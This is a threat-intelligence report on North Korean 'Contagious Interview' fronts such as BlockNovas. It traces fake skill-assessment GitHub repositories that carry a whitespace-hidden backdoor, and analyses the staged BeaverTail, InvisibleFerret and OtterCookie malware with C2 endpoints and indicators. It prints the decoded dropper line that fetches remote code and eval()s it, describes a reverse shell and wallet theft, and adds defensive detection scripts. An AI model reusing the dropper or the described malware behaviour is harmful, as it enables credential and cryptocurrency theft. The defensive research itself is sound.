Our threat analysts accessed content on this domain, including additional victim logs and an app.js file containing details similar to those found on other known infrastructure, “api[.]drive-release[.]cloud”.
The camdriversupport[.]com app.js file contained these email addresses:
designedcuratedamy58@gmail[.]com (SENDER)
daisukeoikitsugu@gmail[.]com (RECIPIENT)
eliteengineer8523@gmail[.]com (AM)
rockstar96954@gmail[.]com (RC)
hundredup2023@gmail[.]com (TP)
phoenixfire471@gmail[.]com (MM)
awesomium430@gmail[.]com (AU)
maestro2819@gmail[.]com
(SI)
rodriguezjamesdaniel0807@gmail[.]com (SI)
satoshiyama14@gmail[.]com (ST)
richardkdavis45@gmail[.]com (AC)
thedron101@gmail[.]com (CT)
fairdev610@gmail[.]com (AT)
trevorgreer9312@gmail[.]com (JA)
The Trevor Greer persona has been heavily documented as being associated with the North Korean “Contagious Interview” threat actors.
api.camdriversupport[.]com’s “app.js” configuration file
Within the victim file logs on camdriversupport[.]com, we discovered the following Astrill VPN IPs. Astrill VPN is the well-documented “VPN of choice” for many North Korean threat actors:
155.94.255[.]2
174.128.251[.]99
194.33.45[.]162
198.255.45[.]131
199.115.99[.]34
204.188.233[.]66
208.115.228[.]234
209.127.117[.]234
23.106.161[.]1
23.106.169[.]120
38.170.181[.]10
38.32.68[.]195
45.86.208[.]162
66.118.255[.]35
70.32.3[.]15
70.39.103[.]3
70.39.70[.]194
77.247.126[.]189
91.239.130[.]102
Investigating BlockNovas’ GitHub Infrastructure
Here, our team began searching for any GitHub content associated with “Blocknovas.” We quickly identified 17 GitHub repositories indicating they were for a “Blocknovas skill assessment,” a tactic similar to other malicious lures, which we detail further below.
One GitHub user, “Bigrocks918” (hxxps://github[.]com/bigrocks918), contributed to 4 of the 17 skill assessments, as described below.
hxxps://github[.]com/xorostar/blocknovas-llc-currency-converter-task
Within one of the BlockNovas skill assessments on GitHub, Silent Push analysts discovered an obfuscated backdoor located at:
/backend/services/PaymentServices.js
hxxps://github[.]com/mirzamudassir/blocknovas-nyx-public
The repository developers hid their malicious code by inserting numerous spaces before it so that it rendered off-screen in a code viewer. Below is an example, along with additional analysis of this script.
Hidden obfuscated malicious code from hxxps://github[.]com/mirzamudassir/blocknovas-nyx-public
Through an advanced code search within GitHub, which is only available when logged in with an account, we discovered 8 GitHub repos in total containing the same code snippet:
hxxps://github[.]com/search?q=path%3Abackend%2Fservices%2F+content%3Aeval%28decodeURIComponent%28%27&type=code
(URL-decoded, that query is: path:backend/services/ content:eval(decodeURIComponent(' )
In total, we confirmed 9 GitHub repos spreading the backdoor:
1. github[.]com/Collaborate3562/ncipher-backend
2. github[.]com/Paragkoche/ncipher1.2upgrade-backend-2
3. github[.]com/TopStar720/nyx4
4. github[.]com/asimhafeezz/blacknovas-test
5. github[.]com/hrjaffery/nyc-bitquery-whale-transactions
6. github[.]com/krishprism1/ncipher1.2upgrade-backend
7. github[.]com/SyedMinhalHasan/blocknovas-task
8. github[.]com/artur-kolesnyk/NyxCipher-test
9. github[.]com/xorostar/blocknovas-llc-currency-converter-task
We know GitHub does not index everything in search, and we were able to find 7 more repositories by searching “blocknovas” and “nyxcipher” that had the same obfuscated code:
1. github[.]com/David-Odoh/Nyxcipher
2. github[.]com/Ianstiefvater/blocknova
3. github[.]com/PrimarchOrder/Blocknovas-LLC-Test
4. github[.]com/Yasin-97/blocknovas-test
5. github[.]com/lArtiquel/nyxcipher.ai
6. github[.]com/mirzamudassir/blocknovas-nyx-public
7.
github[.]com/trishateh/blocknovas-task
Since we knew various accounts were sharing this snippet of code, it was important to understand how it worked.
BlockNovas Malware Analysis – Stage 1
The payload found within the numerous BlockNovas skill assessment GitHub repositories is a visually encoded string with numerous “%” percent signs throughout the line of code, i.e. it is URL (percent) encoded.
Using a simple “URL Decode” recipe in a tool like CyberChef quickly cleaned up the text to expose the previously seen domain “lianxinxiao[.]com”:
CyberChef “URL Decode” recipe on the BlockNovas code payload found across GitHub
This is the final output after decoding the obfuscated code:
fetch(eval(decodeURIComponent('\'lianxinxiao[.]com:5000/tokenizer''))).then(response => response.text()).then(data => { eval(data); });
The code fetched JavaScript from a remote server on lianxinxiao[.]com and passed it straight to eval(), essentially allowing the server to run any code on the victim’s machine.
BlockNovas Malware Analysis – Stage 2: BeaverTail Malware Confirmation
The request to lianxinxiao[.]com seen during Stage 1 led to a long and heavily obfuscated JavaScript payload:
Silent Push Threat Analysts confirmed the JavaScript was obfuscated using the publicly available obfuscator from Preemptive: hxxps://www.preemptive[.]com/online-javascript-obfuscator/
After deobfuscation and renaming some variables, our threat analysts found more than 500 lines of code that aligned to known BeaverTail malware.
As seen with previous samples of the malware, this version of BeaverTail had several key functionalities related to stealing cryptocurrency.
The features include:
Determines browser paths based on the operating system
Collects sensitive data from popular cryptocurrency browser extensions, identified by extension ID:
“nkbihfbeogaeoehlfnkodbefgpgknn”, // MetaMask wallet
Chrome extension
“ejbalbakoplhglecddalleeaeenjim”, // MetaMask wallet Edge extension
“hbjabdcbjhblacgcnapndodjp”, // BNB Chain wallet Chrome extension
“hnfanknocefbdgdijnmhnfkndaad”, // Coinbase wallet Chrome extension
“ibnejdfjmmpclnpebklmkoeihcooifec”, // TronLink wallet Extension
“bfnaelmojmeihmhpjngjophjhpkljopa”, // Phantom wallet Chrome extension
“hifafgmccecpkonpjkcfgodnhcellj”, // Crypto.com wallet Chrome extension
“aphmhefpoccionboohckoenoemg” // Coin98 wallet Chrome extension
(Chrome extension IDs are 32 characters drawn from the letters a–p; several of the IDs as extracted above are shorter than that, so verify them against the Chrome Web Store before using them as indicators.)
Solana wallet credentials
The malware collects the .ldb and .log files (the LevelDB local storage) of those extensions.
Depending on the operating system, the malware:
Collects macOS Keychains
Collects Linux keyrings
Collected data is sent to the C2 via the domain seen many times:
lianxinxiao[.]com:5000/uploads
The malware checks whether it should execute the following steps by querying an endpoint every 10 minutes, for a total of 5 times:
lianxinxiao[.]com:5000/check-running-spec/{hostname}
It is important to note that the malware requests this check with the specific hostname of the victim machine.
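Looking back at the Stage 1 dropper (the eval(decodeURIComponent('...')) statement pushed off-screen by a long run of spaces in backend/services/PaymentServices.js), here is how to hunt for it in a repository checkout before anyone runs the project. The script below is an added example written for this page, not Silent Push tooling and not code from the repositories: it flags lines containing an unusually long run of spaces, decodes the percent-encoded argument of eval(decodeURIComponent(...)), and lists the hosts named in the decoded code. The sample it scans is constructed inline, the placeholder host c2.example:5000 stands in for the real C2, and the 120-space threshold is an assumption to tune.

```python
#!/usr/bin/env python3
"""Hunt for whitespace-hidden, percent-encoded eval() droppers in a JavaScript tree.

Added example for the BlockNovas Stage 1 finding (not Silent Push tooling and not
code from the repositories): the backdoor is a single eval(decodeURIComponent('...'))
statement pushed off-screen by a long run of spaces. We locate the run, decode the
percent-encoded payload, and pull out any host the decoded code contacts.
"""
import os
import re
import tempfile
from urllib.parse import quote, unquote

LONG_GAP = 120  # assumed threshold: a run of spaces this long is hiding, not formatting
EVAL_RE = re.compile(r"eval\(\s*decodeURIComponent\(\s*(['\"])(.*?)\1\s*\)\s*\)", re.S)
STR_RE = re.compile(r"""(['"])(.*?)\1""")
HOST_RE = re.compile(r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,}(?::\d{2,5})?(?:/\S*)?)$", re.I)


def longest_gap(line: str) -> int:
    """Length of the longest run of spaces/tabs anywhere in the line."""
    return max((len(r) for r in re.findall(r"[ \t]+", line)), default=0)


def decode_dropper(line: str):
    """Return (decoded_js, hosts) if the line carries a percent-encoded eval payload."""
    m = EVAL_RE.search(line)
    if not m:
        return None
    decoded = unquote(m.group(2))
    # Take hosts only from string literals in the decoded code, so identifiers such
    # as r.text() are not mistaken for domains.
    hosts = sorted({h.group(1) for _, s in STR_RE.findall(decoded)
                    if (h := HOST_RE.match(s.strip()))})
    return decoded, hosts


def scan_file(path: str) -> list:
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            gap = longest_gap(line)
            res = decode_dropper(line)
            if res is None and not (gap >= LONG_GAP and "eval(" in line):
                continue
            decoded, hosts = res if res else ("", [])
            findings.append({"file": path, "line": lineno, "gap": gap,
                             "hidden": gap >= LONG_GAP, "decoded": decoded, "hosts": hosts})
    return findings


def scan_tree(root: str, exts=(".js", ".mjs", ".cjs", ".ts")) -> list:
    out = []
    for d, _, files in os.walk(root):
        for f in files:
            if f.endswith(exts):
                out.extend(scan_file(os.path.join(d, f)))
    return out


# Constructed sample mirroring the reported layout: ordinary code, a 300-space gap,
# then the dropper. The host c2.example:5000 is a placeholder, not an indicator.
_PAYLOAD = "fetch('http://c2.example:5000/tokenizer').then(r=>r.text()).then(d=>{eval(d)})"
SAMPLE_JS = ("const Payment = require('../models/Payment');" + " " * 300
             + "eval(decodeURIComponent('" + quote(_PAYLOAD, safe="") + "'));\n"
             + "module.exports = { Payment };\n")


def demo() -> list:
    """Write the sample into a temp repo layout, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        svc = os.path.join(tmp, "backend", "services")
        os.makedirs(svc)
        with open(os.path.join(svc, "PaymentServices.js"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_JS)
        return scan_tree(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}:{f['line']} gap={f['gap']} hidden={f['hidden']} hosts={f['hosts']}")
        print("  decoded:", f["decoded"])
```

Run it against a checkout with scan_tree(path). The gap heuristic is kept separate from the decoder on purpose: a variant that drops the percent-encoding, or hides behind a different construct, still surfaces as a hidden line with eval( on it, and the decoded text is returned in full so a second layer, such as the nested decodeURIComponent in the report’s sample, can be decoded by hand.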
This is likely a gating mechanism that allows the actors to explicitly allow or deny execution per victim, for example to withhold later stages from analysts and sandboxes.
Additionally, the malware downloads and extracts additional files needed to execute the main payload on Windows:
lianxinxiao[.]com:5000/pdown
As well as on Linux and macOS:
lianxinxiao[.]com:5000/libs
On all operating systems, if the prerequisites are accepted, it then tries to download and execute:
lianxinxiao[.]com:5000/client/empOQO
which is stored to /.npl and then executed using Python.
BlockNovas Malware Analysis – Stage 3: InvisibleFerret Main Stage
Once the prerequisites have been accepted in Stage 2 and the request is made to lianxinxiao[.]com:5000/client/empOQO, the infrastructure serves the obfuscated Python payload “main_empOQO.py” that BeaverTail then runs, which looks like:
This payload used simple XOR encryption: the first 8 characters of the embedded string are the key, and XORing them against the remaining string decrypts the code.
This led to the decrypted code:
The malware was InvisibleFerret, the payload commonly loaded by BeaverTail. However, this variant had a twist: it contained persistence for all three major operating systems.
The encryption of the C2 was consistent with previous versions:
which is base64 and decodes to:
host2 = lianxinxiao.com:5000
Key InvisibleFerret features from this sample included:
1. Installs the Python requests library if missing
2. Checks if the C2 is up using lianxinxiao[.]com:5000/check-running
3. Creates persistence on all major operating systems:
   1. Windows: Registry Run key, launched via pythonw.exe so that no console window is shown
   2. Linux: desktop entry in the user autostart directory, with Hidden and NoDisplay set to true and autostart explicitly enabled for GNOME, intended to execute whenever the user logs in. (Note that the XDG autostart specification requires an entry with Hidden=true to be ignored, so on a spec-compliant desktop this setting works against the actor; the intent is clearly concealment from the user.)
   3. macOS: creates a LaunchAgent plist file in ~/Library/LaunchAgents/.
macOS automatically loads and executes these when the user logs in. stdin and stdout are redirected to /dev/null.
4. Main function:
   1. Downloads and executes lianxinxiao[.]com:5000/payload/empOQO via subprocess.Popen; on macOS/Darwin, execution ends here
   2. Downloads and executes lianxinxiao[.]com:5000/brow/empOQO, again via subprocess.Popen
The whole process described above only executed if the C2 server returned “true” when checked via lianxinxiao[.]com:5000/check-running.
BlockNovas Malware Analysis – Stage 4A: InvisibleFerret Payload Component
The request to “lianxinxiao[.]com:5000/payload/empOQO” seen in Stage 3 led to an encrypted payload:
The payload used the same encryption as Stage 3, yielding two additional code parts that were executed separately.
The code encrypted in line 2 was decrypted and analyzed for functionality. Key functionalities of this code included:
1. Generates a UUID from the device MAC address and the username
2. Gets the operating system (OS), OS release and exact version, the system hostname, and the current username
3. Gets the user’s local IP address
4. Queries ip-api[.]com to get:
   1. User public IP
   2. User latitude and longitude
   3. City
   4. Region/State
   5. Country
   6. ZIP/Postal code
   7. Timezone
   8. ISP
The data was then uploaded to the C2 server on the keys path with an exact timestamp:
lianxinxiao[.]com:5000/keys
Continuing to analyze the code encrypted in line 7 of the Stage 4A payload:
t="DF90pw2dTi9...
Key functionalities of this portion of the malware included:
For all operating systems:
1. Reverse shell (port 5001)
2. 8 defined commands:
   1. ssh_obj = Executes received commands and returns the output
   2. ssh_cmd = Sets a variable to “close”.
Likely terminating either the connection or the script
   3. ssh_clip = Exfiltrates keylogger/clipboard log data
   4. ssh_run = Downloads and executes the browser stealer component (Stage 4B)
   5. ssh_upload = Multiple methods for file exfiltration
   6. ssh_kill = Terminates browser processes (chrome.exe, brave.exe, Google Chrome, Brave Browser)
   7. ssh_any = Initiates the AnyDesk backdoor
   8. ssh_env = Initiates the file stealer
3. File stealer targeting: cryptocurrency wallet data, environment files, config files from coding projects, documents
4. File-related functionalities appear to use an FTP server to store exfiltrated data. This also applies to the keylogger logs
For Windows specifically:
Keylogger (with window title and process ID logging)
Clipboard monitor
Bad Code Note: The actor seems to have broken parts of this script’s functionality. Both the AnyDesk backdoor command and the browser stealer command expect HOST and PORT variables. However, the actor changed the variable names to HOST0 and PORT0 in the initialization phase of the script, so those two commands reference names that are never defined and should not execute successfully. Additionally, the previous stage already downloads and executes the browser stealer, making the command redundant.
BlockNovas BeaverTail Malware Analysis – Stage 4B: InvisibleFerret Browser Stealer Component
Within the malicious payloads from previous stages, one request was sent to lianxinxiao[.]com:5000/brow/empOQO
This was the “Browser Stealer” component of the InvisibleFerret payloads:
Key functionalities of the browser stealer after de-obfuscation included:
1. Cross-operating-system “browser stealer” for Darwin/macOS, Linux, and Windows
2. Targets both stored credentials and stored credit card details
3.
Implements functionality for Chrome, Brave, Opera, Yandex, and MS Edge
   1. Yandex and Edge are only targeted on Windows
4. Exfiltration via lianxinxiao[.]com:5000/keys
5. Self-deletion after execution or if the OS is not recognized
New lianxinxiao[.]com Panel Interface
In March 2025, Silent Push threat analysts discovered that the lianxinxiao[.]com domain had changed its login interface:
lianxinxiao[.]com:5000 revealed a new interface
We found an alternative path, “public/script[.]js,” referenced in the HTML body, which revealed additional server configuration, including the ability to configure Dropbox for the exfiltration of victim data.
We found a different path via lianxinxiao[.]com:5000/public/scripts.js
Within the script.js, there was information showing that the threat actor retrieved payloads through FTP:
Also found on lianxinxiao[.]com:5000/public/scripts.js was a reference to the domain “angeloperonline[.]online,” which was also seen on the mail.blocknova[.]com monitoring dashboard.
The infrastructure and the malware payloads served through it continued to point back to this same grouping of domains.
By investigating some of the employees of BlockNovas, at least some of whom are likely fake, we could then connect the domains and front companies even more closely to the North Korean Contagious Interview campaign.
Additional BlockNovas “Skill Assessment” Websites, New Cloudflare Obfuscation
Our team found additional BlockNovas “Skill Assessment” job application websites by searching for variations of the “BlockNovas” brand name within different fields in Silent Push.
While conducting diligence on this infrastructure mapping effort, we also searched Google for similar HTML titles.
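Returning to the host side of the chain: the three login-time persistence mechanisms described for InvisibleFerret in Stage 3 above (a Run key that launches the script with pythonw.exe, a user autostart .desktop entry with Hidden and NoDisplay set and GNOME autostart enabled, and a LaunchAgent plist whose stdin and stdout go to /dev/null) are cheap to hunt for on endpoints. The Python below is an added example written for this page, not Silent Push tooling and not derived from the samples: it scores Run-key values supplied as a dict (collected on the Windows host, since the registry is not readable elsewhere), parses .desktop files and LaunchAgent plists as text and bytes, and weights each trait the report describes. The sample entries are constructed here with placeholder paths; the .npl file name is reused from the BeaverTail drop name in Stage 2 only to make the samples realistic.

```python
#!/usr/bin/env python3
"""Score login-time persistence entries for the InvisibleFerret traits reported above.
Added example (not Silent Push tooling). Inputs are plain text/bytes so the checks run
offline over collected artifacts: Run-key values exported from a Windows host, XDG
autostart .desktop files, and LaunchAgent plists."""
import configparser
import plistlib
import re
from dataclasses import dataclass, field

PY_RE = re.compile(r"\bpythonw?(?:\d(?:\.\d+)?)?(?:\.exe)?\b", re.I)
# A dot-file script (e.g. the ~/.npl drop name from the report) ending the command line.
DOTFILE_RE = re.compile(r"(?:^|[\\/])\.[A-Za-z0-9_-]+(?:\.py)?(?:\s|$)")

@dataclass
class Finding:
    source: str
    command: str
    score: int = 0
    reasons: list = field(default_factory=list)

    def hit(self, points: int, why: str) -> None:
        self.score += points
        self.reasons.append(why)

def _common_checks(f: Finding) -> None:
    if PY_RE.search(f.command):
        f.hit(2, "launches a Python interpreter")
    if DOTFILE_RE.search(f.command):
        f.hit(2, "runs a dot-file (hidden) script")
    if "/dev/null" in f.command:
        f.hit(1, "redirects output to /dev/null")

def check_run_values(values: dict, source: str = r"HKCU\...\Run") -> list:
    """values: {value_name: command} as exported from a Run key on the Windows host."""
    out = []
    for name, cmd in values.items():
        f = Finding(f"{source}\\{name}", cmd)
        if re.search(r"\bpythonw\.exe\b", cmd, re.I):
            f.hit(3, "pythonw.exe: runs with no console window")
        _common_checks(f)
        out.append(f)
    return out

def check_desktop_entry(text: str, source: str = "~/.config/autostart/*.desktop") -> Finding:
    cp = configparser.RawConfigParser(strict=False)
    cp.optionxform = str  # .desktop keys are case-sensitive
    cp.read_string(text)
    sec = cp["Desktop Entry"] if cp.has_section("Desktop Entry") else {}
    f = Finding(source, sec.get("Exec", ""))
    if sec.get("Hidden", "").lower() == "true":
        f.hit(2, "Hidden=true (the XDG spec says to ignore such an entry; used here to hide it)")
    if sec.get("NoDisplay", "").lower() == "true":
        f.hit(1, "NoDisplay=true keeps it out of the Startup Applications UI")
    if sec.get("X-GNOME-Autostart-enabled", "").lower() == "true":
        f.hit(1, "explicitly enabled for GNOME autostart")
    _common_checks(f)
    return f

def check_launch_agent(plist_bytes: bytes, source: str = "~/Library/LaunchAgents/*.plist") -> Finding:
    p = plistlib.loads(plist_bytes)
    args = p.get("ProgramArguments") or [p.get("Program", "")]
    f = Finding(source, " ".join(str(a) for a in args))
    if p.get("RunAtLoad"):
        f.hit(1, "RunAtLoad: starts at every login")
    for key in ("StandardInPath", "StandardOutPath", "StandardErrorPath"):
        if p.get(key) == "/dev/null":
            f.hit(1, f"{key} sent to /dev/null")
    _common_checks(f)
    return f

# Constructed samples (placeholder paths, not artifacts from the campaign).
SAMPLE_RUN = {
    "OneDrive": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
    "npl": r"C:\Users\dev\AppData\Local\Programs\Python\Python311\pythonw.exe C:\Users\dev\.npl",
}
SAMPLE_DESKTOP = ("[Desktop Entry]\nType=Application\nExec=python3 /home/dev/.npl\n"
                  "Hidden=true\nNoDisplay=true\nX-GNOME-Autostart-enabled=true\n")
SAMPLE_PLIST = plistlib.dumps({
    "Label": "com.apple.npl", "ProgramArguments": ["/usr/bin/python3", "/Users/dev/.npl"],
    "RunAtLoad": True, "StandardInPath": "/dev/null", "StandardOutPath": "/dev/null"})

def demo(threshold: int = 4) -> list:
    """Run every check over the samples; return findings scoring at or above threshold."""
    findings = check_run_values(SAMPLE_RUN)
    findings += [check_desktop_entry(SAMPLE_DESKTOP), check_launch_agent(SAMPLE_PLIST)]
    return [f for f in findings if f.score >= threshold]

if __name__ == "__main__":
    for f in demo():
        print(f"[{f.score}] {f.source}: {f.command}")
        print("    " + "; ".join(f.reasons))
```

Feed check_desktop_entry the contents of each file under ~/.config/autostart and check_launch_agent each plist under ~/Library/LaunchAgents, and lower the threshold when reviewing weaker signals. The weights are deliberately additive rather than exact-match, so a variant that renames the script or drops one of the traits still scores, and every reason is recorded so the analyst sees why an entry was flagged.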
We came across three domains hosting the same BlockNovas Skill Assessment Quiz:
wonthegame[.]site
xn--12c5eglc5bd7i[.]site
insomnianwin[.]site
The “xn--” prefix in “xn--12c5eglc5bd7i[.]site” indicates that the label is Punycode, the ASCII-compatible encoding (IDNA) that lets domain names carry non-Latin scripts and emoji. Punycode labels always start with the prefix “xn--” followed by a series of letters and numbers; a browser decodes the label and displays the Unicode form, so such domains are worth rendering before judging them.
The example below, when loaded into a browser, renders a visible URL in Thai that looks like ลาสเวกัส[.]site and transliterates to “LasVegas[.]site”.
Google Search results for “insomnianwin[.]site”
Rendition of the above Punycode for Google search results for “site:ลาสเวกัส[.]site”
The three domains and their variants were distinct, but we believe BlockNovas likely owned them.
BlockNovas Skill Assessment GitHub Pivots from MongoDB Lead to “OtterCookie” Malware on server[.]attisscmo[.]com
Silent Push Threat Analysts continued to investigate the GitHub pivots into “Blocknovas skill assessment” repositories.
We noticed that one of the 17 GitHub repos referencing BlockNovas, uploaded by a user with the handle “Collaborate3562” in a repo named “ncipher-backend,” configured a unique MongoDB URL within the key.js file.
hxxps://github[.]com/Collaborate3562/ncipher-backend/blob/main/backend/config/key.js
The MongoDB connection string contained unique credentials, subdomains, ports, and URL query parameters; identical copies of the string should only be found in associated projects, which makes it a strong pivot.
When searching on this specific MongoDB string within GitHub, we discovered
4 repositories in total, which immediately aligned to the “Contagious Interview” TTPs, named:
NYXCipher-test
Dapp-Backend-Test
bitcoin
interview-preparation
The results showed that the first two led to BeaverTail malware with a known obfuscation scheme, but the third, the “bitcoin” repo, was completely different from what we had previously described in this research and observed with this campaign.
Within this repo, we found a “PaymentServices[.]js” file that contained similar obfuscated payloads “hidden” on the first line by adding a large amount of whitespace, as seen in other BlockNovas repos.
hxxps://github[.]com/Asrtothunder01/bitcoin/blob/main/backend/services/PaymentServices.js
After de-obfuscating this new JavaScript, which turned out to be the known OtterCookie malware, we were left with a new C2 domain:
server[.]attisscmo[.]com
De-obfuscated code from hxxps://github[.]com/Asrtothunder01/bitcoin/blob/main/backend/services/PaymentServices.js
After Silent Push Threat Analysts found the new domain (attisscmo[.]com) from the MongoDB pivot, we immediately began investigating it for additional pivots.
To our surprise, we found a new panel named “Kryptoneer” with a pop-up, shown when loading the domain, referencing a separate brand, “Suillama”:
attisscmo[.]com
The site featured a “Connect Wallet” function, similar to those found on consumer-targeting websites, but with an additional “Lock Token” feature, which is more typically associated with an admin panel.
attisscmo[.]com was the new domain from the MongoDB pivot
The “Connect Wallet” feature listed three legitimate crypto brands and attempted to connect to their Chrome extensions if the buttons were clicked:
Suiet Wallet
Ethos Wallet
Sui
Wallet
The “New to sui? Learn More Here” button led to the real support article (suiet[.]app/docs/getting-started) for the crypto brand “Suiet,” which is a “self-custody wallet built on Sui blockchain.”
The attisscmo[.]com domain
Within the JavaScript for this website, there were references to the domains “Kryptoneer[.]com” and “suillama[.]com”:
The site hxxps://attisscmo[.]com/static/js/main.3d770319.js referenced “Kryptoneer[.]com”
The site hxxps://attisscmo[.]com/static/js/main.3d770319.js referenced “suillama[.]com”
In December 2024, the Kryptoneer[.]com website was captured in the Wayback Machine, briefly hosting the HTML title “SUILLAMA”:
hxxps://web.archive[.]org/web/20241217214532/http://www.kryptoneer[.]com/
The domain “suillama[.]com” had the HTML title “Suillama | SUI’s First Permissionless Locker,” which provided more context for the site’s potential purpose.
Silent Push Web Scanner domain query link (datasource = [“webscan”] AND domain = “*suillama.com*”)
Web Scanner results for “*suillama[.]com”
We have not found similar site contents to be publicly reported, and some pivots from this lead into potentially unrelated infrastructure.
We believe it is possible that North Korean threat actors have made additional efforts to target the Sui blockchain, or that this domain is used within job application processes as an example of the “crypto project” being worked on.
Our team will continue to investigate this Kryptoneer/Sui blockchain lead to confirm ties to any crypto initial coin offerings or projects.
The Kryptoneer page does not appear to be a typical phishing page, but the code connections to other low-quality crypto projects align with the “Contagious Interview” developers’ sloppy but aggressive
methods.
During our investigation of the attisscmo[.]com domain, our analysts discovered that lianxinxiao[.]com and attisscmo[.]com were the only sites observed to share the same output on port 8000, a “Decryption failed” response. Beyond the obfuscated code within their JS files and the shared MongoDB strings found on GitHub, this further strengthens the ties between this new domain and the primary BeaverTail domain.
Port 8000 is a C2 port for the Golang FrostyFerret backdoor, as seen previously in this research.
Screenshot showing the “Decryption failed” response on lianxinxiao[.]com
Screenshot showing the “Decryption failed” response on attisscmo[.]com
BlockNovas Employee Analysis & Pivots
From this point forward, the report focuses on establishing concrete links across the network of Contagious Interview fronts, aliases, and fake or suspected-fake employees. We provide additional information to support our claims, findings, and recommendations, further substantiating our threat intelligence research.
Silent Push Threat Analysts investigated BlockNovas’ employees because real people were being impersonated on its “About Us” page.
The “Contagious Interview” threat actors regularly use fake LinkedIn accounts, and we quickly confirmed red flags with some of the BlockNovas employees.
Some real people may be working for BlockNovas without realizing they are working for a North Korean front company, so we will only make profiles public when we can confirm they are fake.
BlockNovas LinkedIn Employees
BlockNovas LLC currently has 12 employees on LinkedIn.
Additionally, individuals who have previously worked for the company can be found through a LinkedIn search.
hxxps://www[.]linkedin[.]com/company/blocknovas/
Suspected Fake Persona: Mehmet Demir
The first profile that stands out as fake is the “Backend Developer” Mehmet Demir.
Mehmet Demir hxxps://linkedin[.]com/in/mehmet-demir-godev Backend Developer | Golang, Python
When viewing the profile photo, several signs indicate that the picture is AI-generated, including the cropping, the bridge of the nose, and random characters in place of a logo on the jacket, among others.
Interestingly, Mehmet Demir indicates he has work experience with both “Blocknovas” and “Angeloper agency”, two organizations seen in the original BlockNovas Status and Monitoring Dashboard.
“Angeloper agency” was confirmed to have a LinkedIn profile at hxxps://www.linkedin[.]com/company/angeloper-agency/ and a website at angeloper[.]com
Mehmet Demir’s work experiences @ linkedin[.]com/in/mehmet-demir-godev
Mehmet Demir aka “Bigrocks918” Connected to Three Likely Contagious Interview Front Companies: BlockNovas, Angeloper, and SoftGlide
Our threat analysts began searching the internet for the name “Mehmet Demir” and quickly connected it to the same domains previously associated with the Contagious Interview campaign.
We found that Mehmet Demir is connected to the persona “Bigrocks918” and to all three organizations previously found on the BlockNovas Status Dashboard: BlockNovas LLC, SoftGlide LLC, and Angeloper.
In October 2023, bigrocks918[.]com hosted a page with the HTML title “Mehmet Demir
Portfolio”:
Bigrocks918 making a commit with ‘Mehmet Demir Portfolio’ in the content
hxxps://github[.]com/bigrocks918/hugo_portf_meh/commit/11b80699fbecea8df32df74b2dcd8046bda669bc
Google search results for “bigrocks918” showing cached content on gitlab.blocknovas[.]com
Further parsing the “bigrocks918” GitHub account, one of the commits on Oct 11, 2023, revealed a Google Analytics ID, “G-2GB0PPGPS1”, a tracking identifier that can be pivoted on across any sites that embed the same tag.
googleAnalitycsID “G-2GB0PPGPS1” via hxxps://github[.]com/bigrocks918/hugo_portf_meh/commit/be2ad1272fd48889f6bad1ef93c326ab3cde11d8
The “Bigrocks918” persona also committed code on GitHub to the “Softglide-landing” code for SoftGlide LLC.
hxxps://github[.]com/bigrocks918/softglide-landing/commits/main/
The same “bigrocks918” GitHub user also had 7 files that reference “Angeloper” within their GitHub repos:
Search: user:bigrocks918 angeloper
hxxps://github[.]com/search?q=user%3Abigrocks918 angeloper&type=code
Digging deeper into the previously seen “angeloper[.]com” domain revealed that it also has a subdomain configured at mehmetdemir.angeloper[.]com, which led to Mehmet Demir’s portfolio.
mehmetdemir.angeloper[.]com
Continuing our research into this persona, Silent Push Threat Analysts discovered another profile on dev[.]to for “Mehmet Demir” with the bigrocks918[.]com domain, along with the description, “I have 7 years of experience in developing, testing, and deploying web applications and microservices using Golang/Gin/Echo/Fiber, Python/Django, PHP/Laravel.”
hxxps://dev[.]to/mehmetdemir
We also found Mehmet Demir and bigrocks918 within a thread on Hugging Face, a machine learning model-sharing company (screenshot below
from January 30, 2024). It is unclear if this was an attack lure or a legitimate question:
hxxps://huggingface[.]co/state-spaces/mamba-2.8b/discussions/5
What is noticeable in the profile picture on Hugging Face is that a similar-looking face is being used for all the Mehmet Demir profiles. It is possible that a real photo was initially used to train the AI, allowing the face to be inserted into various backgrounds and perspectives while maintaining nearly the same appearance.
The Hugging Face profile also includes a photo of Mehmet at a festival or public location, which is likely AI-generated like the other profile photos.
hxxps://huggingface[.]co/bigrocks918
The Mehmet Demir persona also has an account on guru[.]com where they state they were paid $220 from three jobs and two employers since July 2022.
hxxps://www.guru[.]com/freelancers/mehet-demir-full-stack-developer
Demir posted feedback received from three employers on Guru[.]com: people named “John S.
Mansfield” and “Robert Sheinbein” on unknown dates, and a user “Anthony 1109” on October 12, 2023, who wrote, “good fast work thx.”
hxxps://www.guru[.]com/freelancers/mehet-demir-full-stack-developer/reviews
hxxps://www.guru[.]com/pro/employerhistory.aspx?compid=1379332
On the angeloper[.]com website, the “Talk with us” button links to a Calendly[.]com account for “bigrocks918geek”, further confirming ties between the brand and this persona:
angeloper[.]com referenced a calendly[.]com/bigrocks918geek/30min page
We discovered that the domain angeloperonline[.]online was hosted on the Stark Industries IP address 95.164.33[.]66, for which VirusTotal data also records a URL with the directory /pdown, the endpoint BeaverTail uses to fetch its Windows prerequisites (see Stage 2 above) and a unique identifier for that malware. Additionally, port 5000 on this IP, the same port used by the lianxinxiao[.]com C2, was found to have been reconfigured.
Silent Push Threat Analysts believe that victims are lured through angeloper[.]com and that the malware is distributed from angeloperonline[.]online.
VirusTotal[.]com search of 95.164.33[.]66 revealed port 5000/pdown
SoftGlide LLC Ties to Other Contagious Interview Infrastructure and Users
Our analyst team previously connected SoftGlide[.]co to BlockNovas through the Status Dashboard and various GitHub accounts.
The domain markets itself as providing innovation for E-commerce, Blockchain, and Fintech.
Screenshot of SoftGlide[.]co
We found one person, with the handle “hades255” on GitHub, who had been committing code to the BlockNovas GitHub and also followed the SoftGlide GitHub accounts.
This individual joined the BlockNovas LLC organization on GitHub in February 2025 and started
making contributions.
Hades255 GitHub page overview hxxps://github[.]com/hades255?tab=overview&from=2025-01-01&to=2025-01-31
Hades255 GitHub contribution activity overview hxxps://github[.]com/hades255?tab=overview&from=2025-01-01&to=2025-01-31
